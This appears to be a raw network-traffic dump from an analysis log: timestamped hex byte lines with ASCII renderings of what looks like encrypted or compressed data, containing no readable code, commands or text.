                                                                                                                                                  2022-11-15 17:54:38 UTC752INData Raw: 28 06 c7 d4 a7 65 5c d3 f9 05 be eb 8e 40 ac c8 b0 b5 a4 aa 0f f5 3c 10 72 11 f6 0d 2d 53 d5 9d 09 73 5e 8b ab 73 c0 05 9b de a6 4d 53 ce dd 1e 06 b0 ae 54 71 e2 61 ad b0 7e 9b 7f 22 d7 e8 52 b6 c9 52 49 a2 fa 57 81 2d 25 b6 87 bf 15 85 f9 3d 9f 26 2c 86 16 b7 d7 9b d2 08 b2 41 0c 56 fd 21 b9 c6 22 cd a3 0c 69 b8 2b 82 91 6f ac f6 8f 0c bb ca 17 c5 76 5a 81 5f 0a 9d be 7f e8 62 42 f4 0d d4 34 dc 08 3b 85 db 6a 32 8e bf 81 ee a6 29 72 25 88 96 d5 32 b5 f6 bd 50 f8 e9 cf ec 7e 84 b2 3c 0e 07 f6 4c 1b 4d a7 a9 f8 c5 11 1e 1e 5d 53 76 22 cf 20 d2 41 f7 3b cc ce a7 46 73 4d 09 08 0f 03 ba f5 7e 20 1e f3 23 38 c8 a3 6c 20 64 b3 cb e5 fc a8 49 e1 b7 cc 63 2a 95 40 ad 2f b8 fe 73 4f fa fc b0 f0 b4 54 e9 6a 65 0e 47 75 30 97 15 4a 69 b7 31 61 26 9a af 4b cc 25 9e
                                                                                                                                                  Data Ascii: (e\@<r-Ss^sMSTqa~"RRIW-%=&,AV!"i+ovZ_bB4;j2)r%2P~<LM]Sv" A;FsM~ #8l dIc*@/sOTjeGu0Ji1a&K%
                                                                                                                                                  2022-11-15 17:54:38 UTC768INData Raw: dc 69 31 65 a4 f2 d8 d5 7d 46 5c 51 9f 3e d7 d8 60 65 be f6 74 f8 db b7 0b f5 fa 01 c8 fa ec 2d ea 7c db 01 45 0f 45 e3 96 51 cb f0 77 b4 31 03 16 d4 99 64 ee 1f 39 b8 79 ca e7 d2 0f e2 30 67 11 2c f6 41 ac e1 12 09 ee d5 8e 86 13 51 ac 32 48 a3 4f b7 a3 b1 a8 36 2c 38 15 f6 16 f0 d6 4d e8 e9 62 cc 47 6c c7 08 8b c0 dd 64 dd 9f 05 be a5 98 99 61 e5 58 49 44 0f 95 fd 84 e9 61 21 82 f0 e7 91 e4 b3 79 c5 49 d3 7e 5f 57 7b d6 2e 5c 9e a1 7e 64 1f a9 ef 8b ad 3a da 4b e7 c9 9a a9 22 52 e4 19 83 e2 68 bc b3 66 92 b3 4c 8a d2 7b bb c0 f1 6f 32 6a c6 fd 40 28 96 ea b9 c5 04 0e 60 cb aa 97 35 9f 44 e5 e1 ff 21 b9 0e ec 2f a9 94 18 ba 3f ae b2 4d 40 6d 53 54 ef ed bf 3c 4b a1 64 4b 39 1e e8 0f b2 71 50 00 29 94 3d bd f6 4f 58 7c ba d6 67 90 3e e1 ec 6b 66 ce cd 13
                                                                                                                                                  Data Ascii: i1e}F\Q>`et-|EEQw1d9y0g,AQ2HO6,8MbGldaXIDa!yI~_W{.\~d:K"RhfL{o2j@(`5D!/?M@mST<KdK9qP)=OX|g>kf
                                                                                                                                                  2022-11-15 17:54:38 UTC784INData Raw: 41 fd 22 c4 de 36 6e 3e 5c 45 64 81 65 e0 59 c4 51 3c 63 80 4e 33 1e e5 a2 cd 02 b6 b1 75 77 b9 a7 31 b9 7c 78 2e 98 1f 27 69 18 e9 5b 18 5a cd fb 5c 20 3e 25 87 53 cf f0 71 0e d9 5c aa b1 b1 d0 9e df c2 ba 77 0c eb b4 25 80 7d 1a e8 8e 62 44 f0 d3 37 83 af f9 9d a4 c1 7d b7 11 d8 e0 9c 5a bc e1 62 af a6 dd 9f 70 68 da a7 c8 e6 ec 89 4e e5 ed dc 86 b4 a9 be b3 4d 18 00 86 1f d8 45 12 f9 81 f2 19 c7 2c 97 57 f8 9b 82 c2 6e 67 be 02 32 52 d9 47 bc 82 f0 9d 62 e3 fd 7c 44 42 cd 85 b7 8e b8 14 06 e0 11 05 35 ae 69 c6 85 4a 17 c8 21 d9 99 c5 96 ca 95 55 c5 c6 63 c9 09 8e 4f d1 ce 15 98 a3 b5 35 23 24 81 46 3a 87 c7 95 79 11 70 d6 e2 0f b1 6e 72 76 82 67 59 c0 53 2c 8d bd fe 34 21 75 ac 59 1c f0 35 7b cc 83 80 39 73 96 0b f8 95 a2 af 1c 52 03 8b 6c 3d b2 57 6a
                                                                                                                                                  Data Ascii: A"6n>\EdeYQ<cN3uw1|x.'i[Z\ >%Sq\w%}bD7}ZbphNME,Wng2RGb|DB5iJ!UcO5#$F:ypnrvgYS,4!uY5{9sRl=Wj
                                                                                                                                                  2022-11-15 17:54:38 UTC800INData Raw: 38 85 aa ee 04 2d 11 5b d7 ef 3b 18 e7 e4 b3 b0 47 19 d7 f3 b4 cb 2c 84 3c e1 27 7f 6b 32 f0 16 90 26 48 42 d4 d9 d8 44 42 10 f9 ba 7d 99 ee f1 2b 2d ac 72 ab b2 5a 36 82 07 dc 9e eb bc 7c 84 39 59 62 61 7d f7 70 40 17 9d da 16 63 cc 2b f5 74 da 4e 7a 75 61 51 5b 69 58 48 60 3a 4c 6e b9 24 44 e7 60 ed 85 c3 27 4d 12 59 6a 90 63 e3 5c 60 6a fb 55 a0 aa ad 80 6c a9 70 cd 4f 7d a0 5f 61 d7 b8 95 b7 65 03 7b 40 ae 1e c8 bc 20 84 bf a9 b2 09 7e 0e d7 21 d2 e5 44 ac 9b a3 be 2f 1a 06 8c 86 92 be 78 ae f5 e2 83 34 79 c8 ba f7 f7 a7 19 d8 72 7d 24 df 74 46 4c fa db de 36 99 6a 9d cf 6c f8 03 13 34 38 38 e3 a2 15 aa 7e ac bb 2d a0 f5 24 98 99 24 67 89 79 f4 85 80 c5 a2 a2 f7 e7 bc c3 de c2 55 eb 69 12 c3 aa 44 9b c2 cc eb 0e db b7 a8 ad 75 12 85 88 5b 83 6e c8 e9
                                                                                                                                                  Data Ascii: 8-[;G,<'k2&HBDB}+-rZ6|9Yba}p@c+tNzuaQ[iXH`:Ln$D`'MYjc\`jUlpO}_ae{@ ~!D/x4yr}$tFL6jl488~-$$gyUiDu[n
                                                                                                                                                  2022-11-15 17:54:38 UTC816INData Raw: 12 06 d6 9f cd 9f bb 72 2b 5e 88 7e 74 fb 15 94 a1 99 13 2c c3 e5 83 23 9b e1 43 7f f4 5b 16 1a e4 38 44 9b 46 23 16 74 03 69 f5 6a e2 7d be b6 d0 05 63 15 54 1f b9 df b9 ad 2e 44 fd a8 6f 11 36 6c 39 36 7f a5 f9 5d b6 1b c1 10 d8 7a 38 59 8c 04 c2 d7 28 3b 4e 1e b4 e6 e4 63 36 9c 80 54 a5 44 37 d0 2f ce db c2 0f 7a d3 c5 df e7 21 ae 95 72 0e dd dd 07 d7 31 6c ba 6c ce 16 97 64 2a c1 9a 19 ca a8 41 4f 4d 50 44 1a 4f 17 b5 75 62 76 96 8e 70 d6 c9 10 98 ae e8 12 72 b2 29 f9 b3 53 75 05 31 a8 6d 71 b4 05 d4 93 bc 1f 75 26 74 35 a1 92 02 3c dd 06 2a 43 fa 43 fa 5e c0 fd c1 73 a5 61 36 71 17 fd 31 eb 02 7f 5b a1 db 23 4b 2f 00 b1 05 6e bc 3b 6c f2 c5 ce 73 42 dd 16 14 5e db ed 0b 27 1e 96 fa aa a0 03 00 44 63 da 2d dc b4 2d 1d 65 0b 17 a8 ea a0 cd 19 b3 c4 63
                                                                                                                                                  Data Ascii: r+^~t,#C[8DF#tij}cT.Do6l96]z8Y(;Nc6TD7/z!r1lld*AOMPDOubvpr)Su1mqu&t5<*CC^sa6q1[#K/n;lsB^'Dc--ec
                                                                                                                                                  2022-11-15 17:54:38 UTC832INData Raw: 14 0b ad dd 14 f5 64 23 08 72 87 e5 d7 04 ea b5 7c 15 69 d9 f3 b0 ec b1 e0 08 3c c5 a7 e2 7e 5c 04 37 c3 d0 1a a9 85 f5 7f 7f e3 d3 9f fe 61 63 6f 08 56 04 fa c0 1d c3 6c 41 66 eb d5 59 47 e2 74 c2 3b 49 1a 7a a5 fe db 2d d8 75 4f 3d ca b3 e0 ef 1e 82 a4 88 b9 5a 4b 52 a9 20 2d 93 bd a5 22 e1 30 3a bf 03 11 68 d7 c9 aa ae a7 65 ed 86 88 9c ad 5e 54 fb ac 1e b2 71 64 64 4e 8d 7d fe b1 85 24 a6 d7 a6 05 b1 18 06 72 35 5f 89 d1 a8 f6 7d f6 bf 25 68 fd 50 e3 44 ec f0 19 8d db a0 d3 7d 2e 6f 38 08 b4 2a cc fb f5 1f 09 35 79 6e c1 2f 56 84 31 79 77 7c 9b 50 ae e8 3a 2a e7 e3 c3 45 12 43 a0 7d ea 01 bb 07 ff 8f 9a 83 f5 1d fb f8 7f 42 f4 fe bc 4e f4 64 1c 15 fe fc 22 ca 0d 0e b8 57 a9 46 4c 54 f6 71 e1 19 9f 0c 09 d3 2e 0a 14 84 98 74 00 8c b8 78 8f 53 88 41 52
                                                                                                                                                  Data Ascii: d#r|i<~\7acoVlAfYGt;Iz-uO=ZKR -"0:he^TqddN}$r5_}%hPD}.o8*5yn/V1yw|P:*EC}BNd"WFLTq.txSAR
                                                                                                                                                  2022-11-15 17:54:38 UTC848INData Raw: 41 10 f8 4b 98 69 83 23 18 f8 3e f2 1f fd e5 76 9e 06 e3 b2 b9 5d d9 3f 28 aa c0 12 47 87 21 d1 b5 dd 63 4b 29 7f 98 86 3f bf 76 55 76 24 41 9f 9b 82 cd 7c 1a 34 34 b7 fb 81 9f 55 c7 7b a1 56 b7 20 8c 86 9d b5 69 60 61 32 91 20 c7 5e e5 b4 33 b6 9c 31 86 7e 27 1a 5b 94 7e ee d5 a8 fa cb cb fd 8a 34 94 2b ab 9d d2 27 86 5a a2 9a 67 02 93 1e f3 44 0d 13 50 63 f0 55 93 04 f1 26 9e 68 26 ae 9a e9 41 54 9f 58 66 93 f5 7e ad 87 33 aa e0 c3 ad ff b3 d5 96 99 03 44 f0 49 d7 7b c9 fb 5d 71 32 bc 6b 96 bc 37 33 2a 83 45 8e 7d 37 cd 4e d0 f6 6b b4 f5 af e9 c4 71 a9 79 c5 03 69 b9 4e 2e f1 0e d8 bf f0 bd eb 49 2e 0b ec 67 f9 55 e6 3c d8 e0 0d 3f 6e d1 0d e7 da 24 21 45 42 7d e8 86 2a 7b 8a e5 75 fa 4a f6 71 9f bf 5b 12 e9 49 70 0c 81 72 a5 ab 67 fe 6c 79 4e f1 22 2d
                                                                                                                                                  Data Ascii: AKi#>v]?(G!cK)?vUv$A|44U{V i`a2 ^31~'[~4+'ZgDPcU&h&ATXf~3DI{]q2k73*E}7NkqyiN.I.gU<?n$!EB}*{uJq[IprglyN"-
                                                                                                                                                  2022-11-15 17:54:38 UTC864INData Raw: 38 cf c7 01 86 76 e3 23 23 3b 23 69 18 f0 aa 59 ac d0 4f d5 88 e2 f5 85 c7 96 f8 28 60 01 ee aa 7a 50 a2 03 8e 2f 85 3e 67 b0 21 c1 14 56 80 27 a6 3b b0 c6 fc 9f ff 44 04 42 fc 1e 46 bb e2 68 99 2b 5f 3d e6 19 ef 7a f6 55 c8 b6 35 9d 47 dc fc 7d 21 09 c2 52 0e 0d 62 6e 58 a9 3d 88 e4 42 bb d6 27 2e 50 e4 27 73 c5 7e 15 2c 4a f6 8e 06 24 10 ca 54 e2 fa 48 1b 45 74 65 23 a9 9c 1f 5f c5 7b 05 6a 4d 1b d4 b6 9d 04 71 bb 54 df 22 d2 01 af cc f0 b0 8b be 84 e7 74 10 2f 3e 63 77 4a c4 b4 5d 56 92 00 9f 3a 87 87 ab 97 3b b1 47 50 e7 2a 54 27 7e 3a 16 b0 54 ab 78 71 0a fa 1b de 91 4b 67 52 40 cf 7f 79 d3 f4 b1 a1 81 96 c2 f9 5a ab 79 8d f1 8c bf 53 0c dd 5e 3a 39 1d aa a8 46 d2 89 f9 ad 6d 12 59 8c 6a d7 37 bc 89 9c 80 00 3d 0c 5f 8b b8 f9 1e 99 62 0a 81 dd f1 42
                                                                                                                                                  Data Ascii: 8v##;#iYO(`zP/>g!V';DBFh+_=zU5G}!RbnX=B'.P's~,J$THEte#_{jMqT"t/>cwJ]V:;GP*T'~:TxqKgR@yZyS^:9FmYj7=_bB
                                                                                                                                                  2022-11-15 17:54:38 UTC880INData Raw: e1 4f 72 9d 15 1b 66 bc d1 42 36 94 24 c0 92 e8 60 fa d0 0c 4b c2 37 ed 61 44 fe 4a b8 c8 e1 50 c9 05 82 e5 d8 45 b1 66 8e e8 f6 ad d1 85 06 2e fb bd ec d4 88 28 2c 2c fe 93 e8 ad be 5a 26 d0 9c 89 9b f8 da e2 b3 91 b3 e9 ab a7 7f 85 8c 13 ce cd 2d 68 9c 74 71 04 21 15 7f dd 92 42 dc e1 a6 82 c7 54 6c 1b a8 d6 89 08 72 68 83 33 63 6d 28 29 20 84 a2 67 09 fe 97 1e 9c 14 b7 88 11 37 42 50 76 06 d7 0b 25 e6 37 30 6e 21 64 c2 f2 58 37 d0 e1 94 30 92 a2 65 cb 4d 93 21 0e e1 7a a3 8d 7b d8 1d d3 2d c2 93 ac 9c f0 49 88 8b c8 f8 eb 4e 3f cf bf f5 cb 1c 33 c6 21 44 d4 c5 7c cb 9f 09 a8 d0 bb 26 14 3c 92 38 8f f4 3e b7 44 a1 87 1e 8d 20 53 9c 2d ef d4 34 35 2d f5 89 f3 a8 e9 e0 ad a0 1c c5 b9 fa 0b 97 c6 3c 4e fd 3d 86 95 86 3a 0b 91 5b 50 a6 11 d9 8d 2b 77 74 85
                                                                                                                                                  Data Ascii: OrfB6$`K7aDJPEf.(,,Z&-htq!BTlrh3cm() g7BPv%70n!dX70eM!z{-IN?3!D|&<8>D S-45-<N=:[P+wt
                                                                                                                                                  2022-11-15 17:54:38 UTC896INData Raw: 7e 8e cb cc 33 e9 bb 37 eb ba cd a2 41 91 47 01 9d da f2 53 46 82 f0 9f 3f c5 f2 77 10 44 11 8d 3e c8 58 c0 18 20 61 2a 49 12 50 bd 42 5d 0f be 55 0c 67 89 9e 30 b2 6b 9d 06 11 27 bb 30 d3 50 d9 2d 57 fa 78 3f 53 3b 09 4f 56 f6 81 f7 11 74 53 40 14 b3 7f b0 53 fd 36 c8 0a ce 38 21 5a 1b b5 14 ac 30 13 ab be 03 a9 a6 50 78 34 ef 31 78 bc 35 8d 0a 1f 1b 6e 3e 98 61 3f 9a dc e4 e4 fb e0 fa 1e 41 4c d7 22 72 78 02 a2 fe c6 d9 ef 7a 15 6b 69 93 1e c4 f9 76 18 c7 b1 2f 93 4f 6f b6 5b 06 c6 f8 74 0b df 25 6c e1 95 fd cc c6 1e e0 68 e2 23 fd f3 7e ca e8 90 2d fa eb db f1 59 a5 3d b0 97 14 3b 56 1b 0d 17 5a 4b 9b 0b 8d 18 10 67 02 fa db 0c f8 a4 73 fa c2 2d 5d a8 84 41 4e 90 72 ac 01 38 49 a7 87 9b a2 8b 72 47 a6 7f 88 da 3e 77 80 9e 9c 24 d5 b6 d1 a9 85 1e 53 f2
                                                                                                                                                  Data Ascii: ~37AGSF?wD>X a*IPB]Ug0k'0P-Wx?S;OVtS@S68!Z0Px41x5n>a?AL"rxzkiv/Oo[t%lh#~-Y=;VZKgs-]ANr8IrG>w$S
                                                                                                                                                  2022-11-15 17:54:38 UTC912INData Raw: 84 86 22 bc 52 58 44 f4 ab af b8 36 06 1e 76 20 ac fe 07 eb 7d ae 4a c5 3b 76 13 ca 5a 69 95 5e 05 b1 c1 e5 19 a7 08 72 e9 eb 25 cd ab cc d3 84 62 11 d9 02 b4 5c ba e6 61 a2 e9 5e 2c eb f7 da 7f bf 16 e3 68 2f c5 4e 22 aa cc 12 6f 5f 49 36 bf f0 23 09 68 ef df 0f 7c e0 6b 9a c0 b4 4d 44 3a 70 40 61 de f2 3d 01 8b 14 27 56 d7 87 fa 97 af 43 bb 53 b6 cd 04 7d 22 86 09 47 8c 59 f4 a3 f2 67 89 1c 06 87 97 50 6e fe 25 5f ef ed 5e b5 56 24 35 ca 72 c5 45 2e d0 04 f9 21 2d d0 ea 06 8f e1 1c 43 03 97 5e c7 9b 25 7c 9c 58 31 8f 35 2c 75 42 ff 6e f4 4e 4e 60 c0 fc 14 d0 3a 65 5b f8 4e f1 cb e7 b4 42 65 ca 86 d3 ff 4c b3 a6 0b 5f 66 68 3f 4a ac 16 d2 9f 74 53 89 70 a7 16 07 b9 8e f3 90 eb 42 f7 f5 7f 1f 6c 00 bf 32 40 2e 30 10 31 09 41 ba 8e 6e 12 cc 11 95 ae 37 15
                                                                                                                                                  Data Ascii: "RXD6v }J;vZi^r%b\a^,h/N"o_I6#h|kMD:p@a='VCS}"GYgPn%_^V$5rE.!-C^%|X15,uBnNN`:e[NBeL_fh?JtSpBl2@.01An7
                                                                                                                                                  2022-11-15 17:54:38 UTC928INData Raw: cb 03 f0 d3 cd dc c3 96 87 32 1e 71 35 51 01 d5 38 55 5a 4c 2d 7f c0 2f 8c 57 80 66 98 08 4e 58 da e0 da 2c e0 58 3a 37 fc 57 61 12 b1 ee 2b 76 75 ee 16 65 7d 59 3f 89 eb 2c bc ff 3e 53 02 f0 7f ad 59 ac 1e 3b 93 05 cd 37 b0 45 94 f3 82 a5 cf c0 80 1b 3a da 69 e8 4f df 73 fd 90 8a 6d 35 ff ae cb 94 86 d0 86 a0 e6 9f ee 15 14 b2 4b c6 67 b7 ef 82 b6 97 8f 05 94 f5 75 be 3e c2 7d d7 66 cb 8b fa cb 37 75 96 72 35 3c 26 8b 57 d5 03 8c 30 03 ba d5 c4 bc 61 fd a9 9d 33 88 25 20 a7 87 b1 a8 cd b6 70 d7 5d f5 9f d0 23 ba 27 34 cf 66 6a 76 ab e9 6e 2d 61 30 36 f7 2f 8a 65 34 f5 1e 4a a3 09 0d af b2 19 d1 bb 17 6f e8 70 55 9f 90 78 68 1e d4 46 88 30 07 f3 0d bc 59 6e 44 79 b0 c5 54 9a d1 56 32 54 20 4b cf b6 41 f4 d5 68 1a 4f 53 8b 2e 27 80 3b 80 42 56 10 bd 0c f1
                                                                                                                                                  Data Ascii: 2q5Q8UZL-/WfNX,X:7Wa+vue}Y?,>SY;7E:iOsm5Kgu>}f7ur5<&W0a3% p]#'4fjvn-a06/e4JopUxhF0YnDyTV2T KAhOS.';BV
                                                                                                                                                  2022-11-15 17:54:38 UTC944INData Raw: 3f 1c 59 19 40 8c b3 69 e4 73 61 d0 2f d8 41 f7 07 09 33 c7 44 2a 95 64 e7 4b 6a 86 25 2f 4d e3 b2 f4 7c 19 4a 5e f1 ac fa b4 b8 aa e5 a4 2a 3a ed 92 9e b3 a8 a1 a7 d6 9d 34 19 80 45 94 55 fc c9 54 f2 e6 03 1c 0a e3 02 a9 86 6a 86 b1 02 1b ed ab dc 06 90 dc 27 97 25 f0 ac 1a 75 6d 64 62 37 df 9a 0d fc e3 c9 96 5b 83 6c a4 56 4d 69 b2 2c 41 e4 d4 38 bb a2 4c 6b 35 6f 1f 74 ee fa 18 48 5f 74 fb 60 31 32 14 df b8 ac 84 b6 1a 33 05 3b 02 33 4e 28 ed f1 48 c7 7c e3 24 5a fb 09 77 91 45 de c8 57 70 1e 59 4f e1 70 ca c4 d2 ef ca ec 9c ac 1b bf 6f 29 76 12 af e7 7e c9 80 07 3a 5d 94 19 30 d7 1c 7f 0c 8f 19 d1 28 6f 0a 13 e2 56 6e 85 64 93 9a 42 fc 2d e5 f3 04 91 2b 6c 69 06 0a f6 7a 98 62 b8 b7 76 29 15 02 3b 42 32 e0 12 62 d7 53 84 c6 59 e0 13 9f 4e 12 3d d9 ee
                                                                                                                                                  Data Ascii: ?Y@isa/A3D*dKj%/M|J^*:4EUTj'%umdb7[lVMi,A8Lk5otH_t`123;3N(H|$ZwEWpYOpo)v~:]0(oVndB-+lizbv);B2bSYN=
                                                                                                                                                  2022-11-15 17:54:38 UTC960INData Raw: 89 b1 05 81 be 14 5d 93 47 a7 fa 02 d4 29 36 4e 85 29 7c 6f 18 46 0c 2e 86 97 64 f6 86 59 99 e3 c7 8a 54 8d fe 1d aa 67 06 e6 7e 81 fb 70 9d da df ed 4b 90 71 c0 0b d0 fa 5e d9 a2 8a 24 c9 a9 d3 a8 c2 39 d4 b4 63 27 81 e8 86 96 08 2e 74 46 53 f7 39 b0 f4 24 4c 6c fd f1 8d d3 0f e9 f4 79 20 4c db 00 c1 3c 7d 91 d6 48 fe 3a 61 74 28 d1 2c 3a b7 18 a3 19 14 84 9c d2 11 b5 5a 9a 42 de 14 1a 79 e2 9a 62 d2 79 46 dd 39 ab 5e 1e 6e 30 c8 3f 2c 83 48 0a f7 00 c3 72 23 a8 c9 d3 a1 4c 2e 32 ef 24 b3 4e bb 8a 16 43 8f af 67 ab 85 b5 f3 34 f5 0d 3b a6 c0 85 5f 17 cc 59 8f 08 3c 80 e3 5e 7d b0 03 ef f3 00 6b bc 10 a6 f0 c6 3d 68 07 ce ae 71 90 bf 73 90 97 dd ce 21 9c 06 38 82 f2 14 5b ee 2d a9 87 fb 57 31 34 3c 66 ae b9 7c c5 eb df b3 38 28 43 90 cc 26 60 8b e0 a0 cd
                                                                                                                                                  Data Ascii: ]G)6N)|oF.dYTg~pKq^$9c'.tFS9$Lly L<}H:at(,:ZBybyF9^n0?,Hr#L.2$NCg4;_Y<^}k=hqs!8[-W14<f|8(C&`
                                                                                                                                                  2022-11-15 17:54:38 UTC976INData Raw: 77 4a cb 63 3f ab c4 54 f4 30 97 9a af 07 75 ae b5 e7 00 88 f1 5f 48 63 01 da 62 0f 57 8e 7a be 4a aa 6c 33 e1 5f 78 e8 03 09 80 08 bc 0d 84 81 fa 0f 8b df 52 cc c3 26 3f e3 f0 a3 0d 54 9d 4b 50 7d ae cb 15 c4 e6 5b 1e a3 7f e9 2f 67 24 90 dd fa 6e e5 62 81 b2 c0 27 d1 78 64 ef b6 e4 a9 2e 8f 72 8a 8b 33 d1 de 98 f5 3a db 52 49 b8 6f e5 22 91 01 f1 0f 09 f4 40 9a 86 bb 36 6b 83 68 7b 3f ce 86 47 5b 4b 93 ae 96 13 7e 1a 4e 59 05 63 3f 2c 44 61 6a 6e 79 72 7c 48 ae bd d1 83 0a af 42 d6 33 9b 82 18 d8 2d 31 eb 0f a0 9a a7 83 c5 fb 3a 41 a9 e3 16 f1 0b 53 41 9c 85 48 e9 5b 92 01 a2 8e a8 54 7d cc 1a 4a f0 f3 de ac 30 c6 7e 68 0e 95 40 3f e6 77 5f e9 7e 49 d8 b8 6c d3 6b 49 2c d4 a4 e3 2a 42 8a 8a 88 c6 85 ec d8 c6 b6 23 2d 7a 89 11 44 9b 59 36 cb 1e 82 62 d2
                                                                                                                                                  Data Ascii: wJc?T0u_HcbWzJl3_xR&?TKP}[/g$nb'xd.r3:RIo"@6kh{?G[K~NYc?,Dajnyr|HB3-1:ASAH[T}J0~h@?w_~IlkI,*B#-zDY6b
                                                                                                                                                  2022-11-15 17:54:38 UTC992INData Raw: a2 56 9e 75 b3 85 9c 38 18 51 1f 7c 21 7f c7 9b 49 6b 07 24 0b af 23 d7 d9 5e 34 2b 4a 55 3f fb 75 5d 88 ef b4 c1 40 e7 b3 ad af 64 ff c9 56 73 58 94 2f 8a 57 0c e0 5e 35 53 a2 ff a8 a0 71 d6 e6 86 ae 5e 9c 29 ec 3b 6e a7 77 14 af c4 c0 44 86 8b 33 30 3c 83 5b 2c df d7 8a fc 9a 2f 66 ae 01 30 81 96 0d bc 07 e1 63 4a ea 2c 3d 0d 03 74 04 1b 9c 36 29 be ec a8 db d3 fa 5d 46 47 bc ab 25 ed 9c fd 26 3b ad 2d 4e 7e e2 6a 91 21 ef 0a 58 ed bd ef 8c de dc 67 23 7b 22 fc fc 77 d0 2c 13 d1 3a 5b e5 75 2e 5a e2 12 6c cb be e9 17 51 4e 84 6f c5 e6 73 cd 58 87 63 0b d6 9b 4d 83 c8 5a 84 55 3b 22 c0 39 c0 e0 2c 7f 28 06 78 34 eb c3 ea bd b9 04 b6 7b 37 c5 a5 cc 0d c3 da a5 de cf 0c 6d 59 80 ea 9a 9b 04 7c a5 a5 86 7f 91 68 3f da 94 4f 7d 4c ed cc c4 47 48 cf 0e 0a bd
                                                                                                                                                  Data Ascii: Vu8Q|!Ik$#^4+JU?u]@dVsX/W^5Sq^);nwD30<[,/f0cJ,=t6)]FG%&;-N~j!Xg#{"w,:[u.ZlQNosXcMZU;"9,(x4{7mY|h?O}LGH
                                                                                                                                                  2022-11-15 17:54:38 UTC1008INData Raw: 51 50 14 76 39 09 e2 33 22 0d ac d7 ae 6e 0f 9c 9e 6b 39 f3 2c 7d 59 75 41 ef 7c 3f 3c 29 e1 30 fb aa 6f 07 d9 b5 0d 88 55 f8 48 e5 d3 c1 b6 56 3b 5b 87 de d1 89 7a 16 d8 03 09 a5 99 20 69 2e ab 07 7e f5 63 e6 db 6c 33 c0 2d 11 a4 22 ab de 42 33 ee 83 90 24 ee 65 8c 59 91 53 89 f3 ff e4 ef 5a 9e 2c f4 b2 e7 8c 95 22 b0 56 45 53 cd 29 8b 1e c4 1a c8 72 97 9b 12 c9 3c 74 4d 0a 20 8b 35 98 7e eb 54 7c 65 c5 3e 0c 49 e6 34 e1 7e ce 8c 5a 34 9b 7d a0 60 5e 4c 29 80 ab 71 a7 ba 64 76 a5 3a 5e 56 72 ff e2 11 6e 73 a6 7b 38 a3 6f 5f 8b ec 99 f6 36 ab 5b 0a 48 4d ee 18 c4 99 a5 d8 54 11 13 02 8e 8a 90 27 5a de 3d 09 11 b2 6c 14 9d 71 09 c5 52 ab 84 b0 93 6e f9 94 76 91 c9 ed f2 d1 75 8e 24 61 38 be d5 8e 1e fe 69 89 99 b7 2c 72 e6 f6 08 42 a5 59 fa 5b 4d 7a fd a3
                                                                                                                                                  Data Ascii: QPv93"nk9,}YuA|?<)0oUHV;[z i.~cl3-"B3$eYSZ,"VES)r<tM 5~T|e>I4~Z4}`^L)qdv:^Vrns{8o_6[HMT'Z=lqRnvu$a8i,rBY[Mz
                                                                                                                                                  2022-11-15 17:54:38 UTC1024INData Raw: 33 0d 53 0f cc 63 1a af 13 4e 2b 1d 28 95 2e ef dd 98 29 bd af ee 88 e3 b7 21 4e 10 1f 56 3c b2 8b 3b d9 0c 2d ed c9 17 dd b3 11 b9 4a 0d 0f 9e 9e d7 2c 82 96 bd 8b 8d 29 54 e7 75 e9 27 8d 97 6b 17 23 eb 36 72 29 e2 31 45 f9 2f 61 23 d6 7a 4f 6d e1 79 f6 76 85 c8 47 52 b8 78 e2 5d dc a7 80 1b 67 ad 9b 53 29 b6 cf 54 47 bc 96 f1 05 03 8b 3c c5 76 55 e7 7c 12 7c d7 83 b8 0b 44 98 7b 7e fb 35 69 59 e9 8d 03 5a c0 82 f7 dd 40 3d c6 91 c4 9b 21 3d 8c 3c 38 ef 4f 2b 42 fb b5 b8 34 ca 63 7f e1 c3 07 6e 8e a9 42 ee c1 0e b5 cf de e4 b6 cb a4 9c 64 63 00 ff 51 3d 2b 9b 6e 6c 0e 55 07 4f 48 8f f8 c2 6b ad 59 57 00 66 90 4b 0c b1 bf d7 e9 ae a4 ab 9c 81 80 b5 79 5c fa 83 d1 6f 04 89 94 80 f2 c5 36 bc f1 dd dd 7c 54 1e a7 a8 6c 85 13 38 be bd 0d 6b 39 ca 49 b1 5d 14
                                                                                                                                                  Data Ascii: 3ScN+(.)!NV<;-J,)Tu'k#6r)1E/a#zOmyvGRx]gS)TG<vU||D{~5iYZ@=!=<8O+B4cnBdcQ=+nlUOHkYWfKy\o6|Tl8k9I]
                                                                                                                                                  2022-11-15 17:54:38 UTC1040INData Raw: 05 ce 2e 91 cf 58 8a 2c 83 b8 3d dc 57 b3 57 f5 58 cc a1 53 b7 dc ed e9 e2 a3 88 88 e6 bf b9 51 16 aa b1 72 95 7a fb ef 33 54 e1 b8 68 bb 67 55 64 01 fe 98 c3 f2 31 21 a5 dd ab 12 15 56 85 a8 44 62 2c e1 f8 ef 2c 15 d5 18 3e 88 af 7e ea b4 dd 6a ab e2 fb 52 03 6e 4f b6 10 b7 82 b9 84 45 78 f0 ee 7c 86 44 76 bb 4e 57 12 36 b5 d7 b0 d7 35 f6 d3 7f 5e 87 de fe 5c 67 8d 91 e6 12 0e 39 76 ba 77 27 bb 3c 97 81 d8 6a db 65 35 29 2a 55 34 71 d2 b3 cb c3 e9 98 e1 20 87 7f e1 ea 2f ec 2d 3c 22 d7 af 13 7a 81 98 fc 12 34 32 df 35 ea 1c d2 1e 64 ef 2f 8c 9d 5b 5d 6f 5b 33 87 91 eb 1a d3 2d 1d 2d 23 8a ce 0e b2 57 e0 35 c2 d3 a6 30 24 4a 7c 31 4f 47 0d f4 24 eb 98 9e 3e 5f 27 34 8a 3d 03 c0 13 1a 05 77 64 14 48 85 d4 0e 43 12 92 61 cd ba 39 4f 6b 90 18 9e 33 86 d7 01
                                                                                                                                                  Data Ascii: .X,=WWXSQrz3ThgUd1!VDb,,>~jRnOEx|DvNW65^\g9vw'<je5)*U4q /-<"z425d/[]o[3--#W50$J|1OG$>_'4=wdHCa9Ok3
